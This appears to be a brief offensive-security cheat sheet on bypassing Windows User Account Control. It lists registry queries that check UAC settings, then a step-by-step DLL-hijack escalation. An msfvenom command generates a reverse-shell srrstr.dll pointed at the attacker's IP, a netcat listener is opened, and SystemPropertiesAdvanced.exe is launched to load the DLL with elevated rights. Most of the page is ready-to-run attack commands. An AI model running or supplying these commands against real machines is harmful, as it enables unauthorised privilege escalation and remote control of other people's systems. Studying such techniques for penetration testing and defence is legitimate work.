User Account Control (UAC) Bypass
Last updated
Was this helpful?
Last updated
Was this helpful?
UAC bypasses leverage flaws or unintended functionality in different Windows builds.
The following repository contains many different UAC Bypassing Techniques:
Check if UAC is enabled (0x1=true): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Check the UAC level(0x5=max level): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
To check the Windows Build: [environment]::OSVersion.Version
Check repository and see if anything exists for the target build number
We can basically bypass UAC by placing a malicious srrstr.dll
DLL to the WindowsApps
folder, which will be loaded in an elevated context
Generate malicious DLL file:
msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll
Transfer the DLL on the target machine
Start a netcat listener on the attacker machine: nc -lvnp 4444
Get a reverse shell: C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe